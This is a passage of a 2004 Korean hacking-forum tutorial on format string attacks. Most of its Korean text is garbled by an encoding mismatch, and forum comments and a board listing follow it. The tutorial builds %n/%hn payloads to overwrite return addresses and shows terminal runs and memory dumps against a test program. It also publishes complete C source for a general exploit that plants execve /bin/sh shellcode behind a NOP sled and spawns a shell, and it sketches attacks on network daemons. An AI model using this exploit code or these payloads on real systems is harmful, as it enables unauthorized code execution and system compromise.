ÇÊ¿äÇÏ´Ù. º¸Åë %nµð·ºÆ¼ºê´Â 4byte¿¡ ÀúÀåÀ» ÇÏ°Ô µÇ¾îÀÖ´Ù.  (º¸Åë integer= 4byte)
±×·¸´Ù¸é ¿ì¸®´Â Ãë¾à ÇÁ·Î±×·¥ vulfmt¿¡ ´ëÇØ  ´ÙÀ½°ú °°Àº format stringÀ»
±¸¼ºÇØ º¼ ¼ö ÀÖ°Ú´Ù.

¿ì¸®°¡ %nÀÌ °¡¸£Å°´Â ¿µ¿ª( Áï ¸®ÅϾîµå·¹½ºÁöÁ¡)¿¡ 0xbffff7a0ÀÇ °ªÀÌ Ã¤¿öÁö°Ô
ÇÏ·Á¸é, ¾à 3221223328 °³ÀÇ Ãâ·Â Æû size¸¦ printf()ÀÇ ÆĽÌÁß %n µð·ºÆ¼ºêÀÇ
¹ß°ß°ú µ¿½Ã¿¡ ÀνĽÃÄÑ¾ß ÇÑ´Ù.
±×·¯ÇÑ Format StringÀº ¾Æ¸¶µµ ´ÙÀ½°ú °°À» °ÍÀÌ´Ù.

  "\xff\xff\xff\xff\xa0\xf7\xff\xbf%3221223320d%n"
  
ÇÏÁö¸¸, 3221223320Àº °áÄÚ ÀÛÀº ¼ýÀÚ°¡ ¾Æ´Ï´Ù. ¿ì¸®ÀÇ ½Ã½ºÅÛÀº º¸Åë ÀÌ·¸°Ô Å« ÆûÀ»
º¸±âÀ§ÇØ ¸¸µé¾îÁöÁö´Â ¾Ê¾Ò´Ù. ( ±×·¯¸é Âü ÁÁÀ¸·Ã¸¸... )
±×·¡¼­ µÎ¹ø¿¡ °ÉÄ£ return addressÀÇ overwrite°¡ ÇÊ¿ä·Î ÇÑ´Ù.

¸»ÇÏÀÚ¸é, 0xbffff7a0 °ú 0xbffff7a2¿¡ 2byte¾¿ µÎ¹ø¿¡ °ÉÃÄ ¾²´Â ¹æ½ÄÀÌ´Ù.
¿îÀÌ ÁÁ°Ôµµ %n µð·ºÆ¼ºê°¡ 4byte¸¦ ¾²´Â µ¥¿¡ ¹ÝÇØ %hnµð·ºÆ¼ºê´Â 2byte¸¦ ¾´´Ù.
  
  "\xff\xff\xff\xff\xa2\xf7\xff\xbf"
  "\xff\xff\xff\xff\xa0\xf7\xff\xbf"
  "%49135d%hn%14241%d%hn

ÁÖÀÇ : °è»êÀº °¢ÀÚÀÇ ½Ã½ºÅÛ¿¡ ¸Â°Ô Çϵµ·Ï ÇÏÀÚ.
¾î¶² ¸Ó½ÅµéÀº ÆĽÌÁß¿¡ garbage¸¦ ÷°¡ ½ÃÅ°´Â °æ¿ìµµ ÀÖ´Ù.
¾ÆÁÖ °ñ¶§¸®´Â °æ¿ìÀÌ´Ù.

ÀÚ, ±×·³ À§¿¡¼­ ¸¸µé¾îÁø Format StringÀ» °¡Áö°í StackÀ» Çѹø ¶§·Á ºÎ½¤º¸ÀÚ.


3.c. Attacking (1)

¾Æ·¡´Â À§¿¡¼­ ¸¸µé¾îÁø Format StringÀ¸·Î °ø°ÝÀ» ÇÑ ½ÇÇà°á°úÀÌ´Ù.
ÁÖÀÇ ±í°Ô Âü°íÇÏÀÚ.

-------------------------------------------------------------------------------
[seo@richard ok2]$ perl -e 'system "./vulfmt" , "\xff\xff\xff\xff\x82\xf9\xff\xbf\xff\xff\xff\xff\x80\xf9\xff\xbf%49135d%hn%14241d%hn"'
ÿÿÿÿ‚ùÿ?ÿÿÿ€??                                                    ÷ÿ?                                                      
0xbffff930  d6 86 04 08 30 f9 ff bf 00 01 00 00 ff ff ff ff   ....0...........
0xbffff940  82 f9 ff bf ff ff ff ff 80 f9 ff bf 20 20 20 20   ............    
0xbffff950  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff960  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff970  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff980  a0 f7 ff bf 20 20 20 20 20 20 20 20 20 20 20 20   ....            
0xbffff990  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff9a0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff9b0  20 20 20 20 20 20 20 20 20 20 20 00 c8 f9 ff bf              .....
0xbffff9c0  09 87 04 08 14 fa ff bf e8 f9 ff bf b3 0f 03 40   ...............@
0xbffff9d0  02 00 00 00 14 fa ff bf 20 fa ff bf e4 31 01 40   ........ ....1.@
0xbffff9e0  02 00 00 00 f0 83 04 08 00 00 00 00 11 84 04 08   ................
0xbffff9f0  dc 86 04 08 02 00 00 00 14 fa ff bf 30 83 04 08   ............0...
0xbffffa00  4c 87 04 08 30 a6 00 40 0c fa ff bf 30 38 01 40   L...0..@....08.@
0xbffffa10  02 00 00 00 2f fb ff bf 39 fb ff bf 00 00 00 00   ..../...9.......
0xbffffa20  5e fb ff bf 68 fb ff bf be fb ff bf dd fc ff bf   ^...h...........

-------------------------------------------------------------------------------
Comment : 0xbffff980 ºÎºÐ¿¡ °ªÀÌ ¿ì¸®°¡ ¿øÇÏ´Â °ªÀ¸·Î ¹Ù²î¾ú´Ù.
°ø°ÝÀº ÀÌ·¯ÇÑ ½ÄÀ¸·Î ÀÌ·ç¾î Áø´Ù. ¸¸¾à ¿ì¸®°¡ ¸®ÅÏ ¾îµå·¹½º¸¦ Á¤È®È÷ Âï¾ú´Ù¸é,
°ø°ÝÀº ¼º°øÇßÀ» °ÍÀÌ´Ù. ±×·¯´Ï±î À§¿¡¼­´Â 0xbffff9c0ÀÇ °æ¿ì´Ù.

À§ÀÇ °ø°Ý¹ýÀ¸·Îµµ ÃæºÐÈ÷ °ø°ÝÀº ÀÌ·ç¾î Áú¼ö ÀÖ´Ù.

ÇÏÁö¸¸, hard study hackerµéÀÌ¿©. Á» ´õ ¼¼·ÃµÈ °ø°Ý ¹æ¹ýÀ» °í¾ÈÇØ º¸ÀÚ.
À§ °ø°Ý¹ý¿¡¼­´Â Ç×»ó ÀÚ½ÅÀÇ  ½©ÄÚµå ÁÖ¼Ò¸¦ ã¾Æ¾ß Çϸç, ±×°Í°ú °°ÀÌ ½ÇÁ¦·Î´Â
HitÀ²ÀÌ ±²ÀåÈ÷ ¶³¾îÁö´Â  Format StringÀ» ¸Å¹ø ±¸¼ºÇØ¾ß ÇÑ´Ù´Â ¹ø°Å·Î¿òÀÌ ÀÖ´Ù.
¾öû³ª°Ô Â¥Áõ³ª´Â ¼öÀÛ¾÷ÀÌ µÉ °ÍÀÌ´Ù.
Ç㳪 ½ÇÁ¦·Î´Â ±×·¸°Ô ¾Æ´Ï¸é, °ø°ÝÀ» ÇÒ ¼ö°¡ ¾ø´Ù.

±×°ÍÀ» °³¼±ÇÑ ÇÊÀÚÀÇ ¼Ò½º¸¦ °ø°³ ÇÏ°Ú´Ù.
¼¼·Ã µÇÁø ¸øÇÏÁö¸¸ Àß µ¹¾Æ °£´Ù.  ;-)

³ªÀÇ exploit°æ¿ì -a ¿É¼Ç°ú °°ÀÌ ¹Þ¾Æµé¿©Áö´Â ÀÎÀÚ°¡ ¸®ÅϾîµå·¹½º·Î ¿¹»óµÇ´Â ÁÖ¼ÒÀ̸ç,
shellcodeÀÇ ¹ÙÀÌÆ® ½ºÆ®¸² Áï, EGGSHELLÀÌ À§Ä¡ÇÒ ½ºÅÃÀÇ ÁÖ¼Ò¸¦ offsetÀ¸·Î ¸ÂÃß¾î
ÁÖ´Â °Í¸¸À¸·Îµµ format stringÀÌ ±¸¼ºµÈ´Ù.. ¹°·Ð Ưº°ÇÑ °æ¿ì°¡ ¾Æ´Ï¶ó¸é, offsetÀº
°ÅÀÇ »ç¿ëÇÒ ÀÏÀÌ ¾ø´Ù. º¸ÅëÀÇ °æ¿ì ÀûÁö ¾Ê¾Æµµ µÉ °ÍÀÌ´Ù. À¯»ç½Ã¿¡¸¸ »ç¿ëÇ϶ó. :)

±×¸®°í ±¸¼ºµÈ format stringÀº ȯ°æº¯¼ö $FMTSTR¿¡ À§Ä¡ÇÏ°Ô µÉ °ÍÀ̸ç, ´Ü¼øÈ÷
±× º¯¼ö¸¦ »ç¿ëÇÏ´Â °Í¸¸À¸·Î °ø°ÝÀÌ °¡´É ÇÒ °ÍÀÌ´Ù.

´Ù¸¸, ÀÌ ¼Ò½º´Â Å×½ºÆ® ¿ëÀ̹ǷΠÃë¾à ÇÁ·Î±×·¥Àº buf¸¦ ÀâÀºÈÄ ÀÌÈÄ ´Ù¸¥ º¯¼ö°¡ ÇÒ´ç
µÇÁö ¾Ê´Â  ¶§¸¦ °¡Á¤ÇÑ´Ù. ( vulfmt.c ¿ì¸®ÀÇ °æ¿ì )
¸¸¾à , ¾î¶² Ãë¾à ÇÁ·Î±×·¥ÀÌ ¾Æ·¡Ã³·³ º¯¼ö¸¦ ÇÒ´ç ÇÑ´Ù¸é,

char buf[128];
int a, b;
char *str

"%x%x%x" ·Î ÇÒ´çµÈ º¯¼ö ¼¼°³¸¦ ¸ÕÀú popping ½ÃŲÈÄ ¿ì¸®ÀÇ À½¸ð¸¦ ½ÃÀÛÇØ¾ß ÇÒ°ÍÀÌ´Ù.

  feature´Â

( ÁÖ¼ÒÁöÁ¤¹øÁö[ret] + Padding ¹®ÀÚ¿­[pad string] ) x 4  +  Popping µð·ºÆ¼ºê [%x%x%x]
+ Ãâ·Â µð·ºÆ¼ºê [%s%hn%s%hn%s%hn%s%hn]


ÇÏÁö¸¸, ´ÙÀ½°ú °°Àº °æ¿ì´Â »ó°ü ¾ø´Ù.

int a, b;
char *str;
char buf[128];

ÀÌ»óÀ¸·Î ¿ì¸®°¡ ÇØ¾ß ÇÒÀÏÀÌ Å©°Ô ÁÙ¾ú´Ù.
ÀÌ°ÍÀÌ ÇÑÅ¥¿¡ ¾î¶»°Ô µ¹¾Æ°¡´ÂÁö ±Ã±ÝÇÑ »ç¶÷Àº ¾î¼³Ç ³ªÀÇ ¼Ò½º¸¦ Àß ÂüÁ¶ Çϱ⠹ٶõ´Ù.

¿ø¸®´Â ´ÙÀ½°ú °°´Ù.
ÀÏ´Ü, ½©Äڵ带 ½ºÅÿ¡ ¶ç¿îÈÄ ÀÎÀÚ·Î ¹Þ¾ÆµéÀÎ ¸®ÅÏÁÖ¼Ò·Î ¿¹»óµÇ´Â °ªÀ¸·ÎºÎÅÍ ÀÌ°ÍÀ»
±âÁØÀ¸·Î Â÷·Ê·Î ÇÑ ¹ÙÀÌÆ®µÚÀÇ 4°³ÀÇ ÁÖ¼Ò°¡ overwriteµÉ ÁÖ¼Ò·Î ±¸¼ºµÇ°í ÀÌ°ÍÀÌ ¹®ÀÚ¿­ÀÇ
Á¦ÀÏ Ã³À½À» Àå½ÄÇÏ°Ô µÈ´Ù. ±×¸®°í, shellcode°¡ ÀÖ´Â ÁÖ¼Ò¸¦  4°³ byte·Î À߶ó format¿¡
¸Â°Ô °è»êµÇ¾î ÀûÀýÇÑ "00000"µéÀÇ ÁýÇÕÀÌ ÀÌ·ç¾î Áø´Ù. ¹Ù·Î À̰͵éÀÌ 4¹ø¿¡ °ÉÃÄ ÁÖ¼Ò°ªÀÌ
overwriteÀÌ µÉ¶§, %n µð·ºÆ¼ºê°¡ °è»êÇÒ ¹®ÀÚ¿­µéÀÌ µÇ´Â °ÍÀÌ´Ù. ¸ÕÀú µé¾î°£ 4°³ÀÇ
Áּҵ鿡 µû¶ó Ç×»ó ¸®ÅÏÁÖ¼ÒÀÇ ³¡ ¹ÙÀÌÆ®´Â 0x10ÀÌ µÇ°í, ´ÙÀ½ÀÇ °¢ ÁÖ¼Ò byte´Â ½©ÄÚµåÀÇ
¾Õ 3ÀÚ¸® ÁÖ¼Ò °ªÀ¸·Î Çü¼ºµÈ´Ù. feature´Â ¾Æ·¡¿Í °°´Ù.

[Â÷·Ê·Î ¾²¿©Áú °¡»óÁÖ¼Ò x 4 ] + %n + [ '0' ¹®ÀÚ¿­ ] + %n  
[ '0' ¹®ÀÚ¿­ ] + %n  + [ '0'¹®ÀÚ¿­  ] + %n

½ÇÁ¦ÀÇ ¸ð¾çÀº ´ÙÀ½°ú °°´Ù.

f7a0 bfff f7a1 bfff f7a2 bfff f7a3 bfff
6e25 3030 3030 3030 3030 3030 3030 3030
3030 3030 3030 3030 3030 3030 3030 3030
*
3030 3030 3030 3030 6e25 3030 3030 3030
3030 2530 306e 3030 3030 3030 3030 3030
3030 3030 3030 3030 3030 3030 3030 3030
*
3030 3030 2530 0a6e                    


¹®¼­¿Í °°ÀÌ Á¦°øµÇ´Â ÇÊÀÚÀÇ exploit¼Ò½º.

<< fmt_exploit.c >>
---------------------------------------------------------------------------  
/*
  *  Foramt string attack general exploit
  *  
  *  by  TrueFinder@IGRUS / khdp.org
  *  seo@igrus.inha.ac.kr
  *
  * usage : fmt_exploit -a <return addr> <offset>
  *          : fmt_exploit -a bffffae0 512
  *          : fmt_exploit -a bffffae0
  *
  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define NOP                    0x90
#define BYTEMASK               0x000000FF
#define DEFAULT_OFFSET         0
#define DEFAULT_EGGSIZE        2048

/* Respected hacker aleph1's shellcode */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long esp_point()
{
        __asm__("movl %esp,%eax");
}

int htod( char *str )
{
        unsigned char var[2];
            
        var[1] = '\0';

        if ( isdigit( str[0] ) ) var[0] = ( str[0] - 48 );
        else if ( str[0] == 'a' ) var[0] = 10;
        else if ( str[0] == 'b' ) var[0] = 11;
        else if ( str[0] == 'c' ) var[0] = 12;
        else if ( str[0] == 'd' ) var[0] = 13;
        else if ( str[0] == 'e' ) var[0] = 14;
        else if ( str[0] == 'f' ) var[0] = 15;
        else {
             printf( "args are not hexcode ... \n");
          exit(-1);
        }
        
        var[0] *= 16 ;

        if ( isdigit( str[1] ) ) var[0] += ( str[1] - 48);
        else if ( str[1] == 'a' ) var[0] += 10;
        else if ( str[1] == 'b' ) var[0] += 11;
        else if ( str[1] == 'c' ) var[0] += 12;
        else if ( str[1] == 'd' ) var[0] += 13;
        else if ( str[1] == 'e' ) var[0] += 14;
        else if ( str[1] == 'f' ) var[0] += 15;
        else {
             printf( "args are not hexcode ... \n");
          exit(-1);
        }

        return var[0];
}

int main (int argc , char **argv )
{
     char *ptr, *egg ;                        
     int offset, bsize;
    
     char b1[255], b2[255], b3[255];
     char  *foo[4], *baddr[4];
     char *fmtstr , *buf;
     int fmtb[4];
     int eggaddr;
     long addr;
     int i , j;
    
     /* our lunch set :-) kalou's method : thanks to kalou */
     memset( b1, 0, 255 );  memset( b2, 0, 255 );
     memset( b3, 0, 255 );

     baddr[0] = malloc(5);  baddr[1] = malloc(5);
     baddr[2] = malloc(5);  baddr[3] = malloc(5);

     foo[0] = malloc(4); foo[1] = malloc(4);
     foo[2] = malloc(4); foo[3] = malloc(4);
    
     if ( argc < 2 ){
          printf("usage : %s -a <return addr> <offset>\n",argv[0]);
          printf("  ex) : %s -a bffffae0 512 \n", argv[0]);
          exit(-1);
     }
  
     if ( argc > 3 ){
         offset = atoi( argv[3] );
     }
     else{
        offset = DEFAULT_OFFSET;
     }
    
     bsize = DEFAULT_EGGSIZE;

     if( !(fmtstr = malloc (1024)) || !(egg = malloc( bsize )) ){
         perror("can't allocate memory.\n");
         exit(-1);
     }
          
        
     for( i=0 ; i < bsize ; i++)
         egg[i] = NOP ;

     ptr = egg + ( bsize - strlen(shellcode) - 1 ) ;
    
     for( i =0 ; i< strlen(shellcode); i++)
         *(ptr++) = shellcode[i];
    
     egg[ bsize -1 ] = '\0';
    
    
     j = 0;
     for( i=0; i< 4 ; i++) {
        baddr[i][0] = argv[2][j];
        baddr[i][1] = argv[2][j+1];
        baddr[i][2] = '\0';
        j+=2 ;
        
        foo[0][3-i] = htod( baddr[i] );  
        foo[1][3-i] = htod( baddr[i] );  
        foo[2][3-i] = htod( baddr[i] );  
        foo[3][3-i] = htod( baddr[i] );  
     }
    
     foo[1][0] += 1; foo[2][0] += 2; foo[3][0] += 3;

     eggaddr = esp_point() + offset;
     printf("Usiing address: %#x\n", eggaddr);

     fmtb[0] = (eggaddr >> 0  ) & BYTEMASK ;
     fmtb[1] = (eggaddr >> 8  ) & BYTEMASK ;
     fmtb[2] = (eggaddr >> 16 ) & BYTEMASK ;
     fmtb[3] = (eggaddr >> 24 ) & BYTEMASK ;

     memset( b1, '\0x90' , fmtb[1] - 0x10 );
     memset( b2, '\0x90' , fmtb[2] - fmtb[1] );
     memset( b3, '\0x90' , ( fmtb[3] + 256 ) - fmtb[2] );

     sprintf(
        (char*)(fmtstr+7),"%s%s%s%s%%n%s%%n%s%%n%s%%n",
        foo[0], foo[1], foo[2], foo[3],
        b1, b2, b3
     );

     memcpy( fmtstr, "FMTSTR=",7);
     putenv(fmtstr);
    
     memcpy ( egg ,"EGG=", 4);
     putenv(egg);
    
     system("/bin/bash");

}
-------------------------------------------------------------------------


±×¸®°í ¾Æ·¡´Â ¿ª½Ã À§ ¼Ò½º¸¦ ÄÄÆÄÀÏÇÑ ÈÄ Çѹ濡 °ø°ÝÇÏ´Â ¸ÚÁø ½Ç·Ê.
dumpµÈ ¸Þ¸ð¸®¸¦ Àß Âü°í Çغ¸¸é ¿ª½Ã µµ¿òÀÌ µÇ¸®¶ó »ý°¢µÈ´Ù.

-------------------------------------------------------------------------
[seo@richard ok2]$ ./lastexploit -a bfffee60
Usiing address: 0xbffff670
[seo@richard ok2]$ ./lastvul $FMTSTR
`?¿a?¿b?¿c??00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0xbfffedd0  d6 86 04 08 d0 ed ff bf 00 01 00 00 60 ee ff bf   ............`...
0xbfffede0  61 ee ff bf 62 ee ff bf 63 ee ff bf 30 30 30 30   a...b...c...0000
0xbfffedf0  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee00  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee10  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee20  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee30  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee40  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee50  30 30 30 30 30 30 30 30 30 30 30 00 68 ee ff bf   00000000000.h...
0xbfffee60  10 f6 ff bf 01 00 00 bf 88 ee ff bf b3 0f 03 40   ...............@
0xbfffee70  02 00 00 00 b4 ee ff bf c0 ee ff bf e4 31 01 40   .............1.@
0xbfffee80  02 00 00 00 f0 83 04 08 00 00 00 00 11 84 04 08   ................
0xbfffee90  dc 86 04 08 02 00 00 00 b4 ee ff bf 30 83 04 08   ............0...
0xbfffeea0  4c 87 04 08 30 a6 00 40 ac ee ff bf 30 38 01 40   L...0..@....08.@
0xbfffeeb0  02 00 00 00 d3 ef ff bf dd ef ff bf 00 00 00 00   ................
0xbfffeec0  a5 f1 ff bf af f1 ff bf 05 f2 ff bf 24 f3 ff bf   ............$...

bash$

-------------------------------------------------------------------------
Comment : It's beautiful. Aren't you ?


3.d. Attacking (2)

À§ÀÇ ¿¹´Â »ç¿ëÀÚ°¡ ·Î±äÀ» ÇÑ »óÅÂÀ̸ç, ȯ°æº¯¼ö¸¦ ¾µ ¼ö ÀÖ¾î¾ß¸¸ ÇÑ´Ù´Â Á¦¾à Á¶°ÇÀÌ
ÀÖ¾ú´Ù. Locale¹ö±×¸¦ ÀÌ¿ëÇÑ °ø°ÝÀ» ÇÒ ¶§¿¡´Â ȯ°æº¯¼ö $FMTSTRÀ» È­ÀÏ·Î »Ñ·Á¼­
»ç¿ëÇغ¸±æ ¹Ù¶õ´Ù. - ¾îÂ÷ÇÇ ¶È°°Àº byte streamÀÌ´Ù. À̸¦ ±Øº¹ÇÏ´Â ¹æ¹ýÀº
hard study hackersµé¿¡°Ô ³²±â°Ú´Ù.

±×¸®°í, È£±â½É ¸¹Àº ¿ì¸® ÆóÀεéÀÇ È£±â½ÉÀÌ ¿©±â¼­ ±×Ä¡Áö ¾ÊÀ¸¸®¶õ »ý°¢¿¡¼­
½ÇÁ¦ Network »ó¿¡¼­´Â ¾î¶² ½ÄÀ¸·Î °ø°ÝÀ» ÇÏ´ÂÁö °£´ÜÈ÷ ¾ð±ÞÇÏ°í Áö³ª°¡°Ú´Ù.
ÀÌÁ¨ ¿ø¸®¸¦ ¾Ë·Á ÁÖ¾úÀ¸´Ï ½º½º·Î ¸¸µé¾î º¼ ¼öµµ ÀÖÀ» °ÍÀÌ´Ù.

Network Attack Hint.
ÀÏ´Ü serverÀÇ buf¿¡ ¿ì¸® »¶ÀûÁö±ÙÇÑ shellcode¸¦ ¸ÕÀú ½Ç·Áº¸³»°í, ±× ÀÌÈÄ¿¡ ±×
shellcode¸¦ °¡¸£Å°°Ô Ưº°È÷ Å×Å©´ÏÄÃÇÏ°Ô °í¾ÈµÈ format stringÀ» ´ÙÀ½À¸·Î ½Ç·Á
º¸³»´Â ½ÄÀÌ´Ù. ÀÌ ¶§¿¡´Â serverÀÇ ¸®ÅÏ ¾îµå·¹½º¸¦ °è»êÇϱâ À§ÇØ Á÷Á¢ ¼Ò½º¸¦ º¸°Å³ª,
¾Æ´Ï¸é  ½ÇÁ¦ ±× µ¥¸óÀ» debugingÇÏ´Â ½ÄÀÇ °íµµÀÇ ÁýÁß(?)ÀÌ ¿ä±¸ µÈ´Ù. ÀÌ´Â ÇÊÀÚ¿¡°Ô
³Ê¹« ¸¹Àº ½ºÆ®·¹½º¸¦ Á¦°øÇϱ⠶§¹®¿¡ ÇÊÀڴ  ¿©±â±îÁö¸¸ ¼³¸íÇÏ·Á°í ÇÑ´Ù.
À̷εµ ¿ì¸® ¸Ó¸® ÁÁÀº Çѱ¹ÀÇ hackerµé¿¡°Õ ÃæºÐÇϸ®¶õ »ý°¢¶§¹®ÀÌ´Ù.

4. Exploit

4.a. Actual Exploit ÄÚµå(1)

hmmm...
±×·¯³ª, ¿ì¸® hard study hackers µé¿¡°Ô ¹Ì¾ÈÇÏ´Ù.
³»°¡ ¿ø¸®¸¦ ÅëÄèÇÏ°Ô ¼³¸í ÇßÀ¸´Ï, °ø°Ý¿¡ ¼º°øÇÑ ExploitµéÀ» ³»°Ô Á» º¸³»ÁÖ¾úÀ¸¸é
ÇÏ´Â ¸¶À½À¸·Î ÀÏ´Ü, ¹®¼­¸¦ ¸ÕÀú °ø°³ ÇÏ´Â ÂÊÀ¸·Î ÇÏÀÚ. ¼ÖÁ÷È÷ ³ª´Â °ÔÀ»·¯¼­ µµ´ëü
ÀÌ ¹®¼­µµ ¿ÂÀüÈ÷ ¸ø ³¡³¾²¨¶ó°í »ý°¢Çß´Ù.  :^!

À§¿¡¼­ ³»°¡ ÇÑ Áþº¸´Ù ´õ ¼¼·ÃµÇ°í, °ø°Ý hitÀ²ÀÌ ³ôÀº exploitÀ» ¾Æ´Â ºÐÀº ȤÀº ,
¿¬±¸ÇÑ ºÐÀº ³»°Ô mailÀ» Áֱ⠹ٶõ´Ù. ¶ÇÇÑ, ±× »ç¶÷ÀÌ ºÎµð Source ºó±¹À̶ó´Â  
ºÒ¸í¿¹ Çѱ¹ ±¹ÀûÀÇ hackerÀÌ±æ °£ÀýÈ÷ ±â¿øÇÏ´Â ¹ÙÀÌ´Ù.

4.b.~4.d.

"it's your space"



P.S1. ¹ø¿ªÅõÀÇ Á¹ÇÊÀ» ¿ë¼­ ¹Ù¶õ´Ù. ³ª´Â ÀÏÂïÀÌ ±Û¾²´Â ÀÏ¿¡ Æ÷±â¸¦ Çß´Ù.
p.S2. ÀÌ ¹®¼­¿¡ ´ëÇÑ CopyrightÀÌ´Ï ¹¹´Ï ÇÏ´Â ¾µµ¥ ¾ø´Â ¼Ò¸®´Â ¾Ê¾Æ´Ï ÀÏ´Ü º¸°í
       ºÎµð ¿ì¸® hard study hackersµéÀÇ °øºÎ¿¡ Âü°í°¡ µÇ±æ ºó´Ù.
       ÀÌ ¹Ù´Ú »ç¶÷µéÀÌ °®Ãß¾î¾ß ÇÒ ±âº»ÀûÀÎ ¿¹ÀÇ ¾Æ´Ñ°¡...
       ±×¸®°í, Àǹ®»çÇ×Àº Áï°¢ ¸ÞÀÏ·Î ÁÖ½Ã¸é ½Å¼ÓÈ÷ ´äÇØ µå¸°´Ù. :)




  Hit : 11425     Date : 2004/07/07 05:20



    
±«µµjs À̰žµ·Á¸é ½Ã°£²Ï³ª °É·Ç°Ù³×¿ä~ 2004/07/14  
line7979 ¿Í¿ì ¿ª½Ã Çй®ÀÇ ±æÀº ¸Ö°íµµ ÇèÇϱ¸³ª~~ :) 2004/10/31  
ssa2co5 º¹»çÇؼ­ °®´Ù ºÙÀÌÁö ¸¶¼¼¿ä 2004/11/20  
bestksw ½ºÅ©·ÑÀÇ ¾Ð¹Ú -_- 2005/09/25  
SNU ÁÁÀº ÀÚ·á °¨»çÇÕ´Ï´Ù. 2008/04/23
hydraggang ¤Ð¤Ð.. ¾Æ¹«°Íµµ ¸ð¸£°ÚÀ½.. ¾î¼Àºí¸® °øºÎ Á» Çؾ߰ڳ׿ä.. 2008/09/02
1561   À©µµ¿ì¿¡¼­ grep »ç¿ëÇϱâ[3]     ¼Û½Ã
11/05 8326
1560   IP ¿Í PORT[8]     ¼Û½Ã
11/02 10022
1559   [ÀÚÀÛ] [C¹®Á¦] ´ë¼Ò¹®ÀÚ ¹Ù²Ù±â[3]     ¼Ò¿ï
03/20 7184
1558   [ÀÚÀÛ] [C¹®Á¦] ¼Ò¼ö¸¸ °É·¯³»±â[2]     ¼Ò¿ï
03/20 7964
1557   [ÀÚÀÛ] [C¹®Á¦] Á¡(.)À» »« ¹®ÀÚ Ãâ·ÂÇϱâ[1]     ¼Ò¿ï
03/20 6767
1556   [ÀÚÀÛ] À©µµ¿ì cmd ÆÁ - º¹»çÇϱâ[7]     ¼Ò¿ï
03/01 9164
1555   [ÀÚÀÛ] FTZ Æ®·¹ÀÌ´× 1~10±îÁö °£´ÜÇÏ°Ô Á¤¸®[14]     ¼Ò¿ï
03/01 14955
  Format String Attack - Concept and General Exploit (by Seo SungHyen)[6]     ¼ÒÀ¯
07/07 11424
1553   ¹öÆÛ¿À¹öÇ÷οì by ¿ÀÇ϶ó[3]     ¼ÒÀ¯
07/07 15258
1552   Overflow °ø°Ý ±â¹ýµé¿¡ ´ëÇÑ Á¤¸® by ¹ö½ºÆ®     ¼ÒÀ¯
07/07 15699
1551   ¿Ö C À̾î¾ß Çϴ°¡ ?[96]     ¼ÒÀ¯
04/09 24892
1550   ÀÎÅͳݿ¡ ¸®´ª½º ¼­¹ö ±¸ÃàÇϱâ[1]     ¼ÒÀ¯
07/07 14745
1549   [Àâ] ³×Æ®¿öÅ© TCP[8]     ¼ÒÀ¯
10/31 9115
1548   [Àâ] ³×Æ®¿öÅ© IP[5]     ¼ÒÀ¯
11/01 10100
1547   ¸®´ª½º ¼³Ä¡Çϱâ - RPMÆí[3]     ¼ÒÀ¯
10/09 9580
1546   ¸®´ª½º ¼³Ä¡Çϱâ - ½©Æí[2]     ¼ÒÀ¯
10/07 9623
1545   ¾ÕÀ¸·Î À̾îÁú ±Û¿¡ ´ëÇؼ­.....[2]     ¼ÒÀ¯
10/06 8461
1544   ¸®´ª½º ¼³Ä¡Çϱâ - µð·ºÅ丮Æí     ¼ÒÀ¯
10/06 9264
1543   ¸®´ª½º ¼³Ä¡Çϱâ - ÆÄƼ¼ÇÆí[6]     ¼ÒÀ¯
10/06 9494
1542   ¸®´ª½º ¼³Ä¡Çϱâ - ÆÁÆí     ¼ÒÀ¯
10/06 8853
[1] 2 [3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org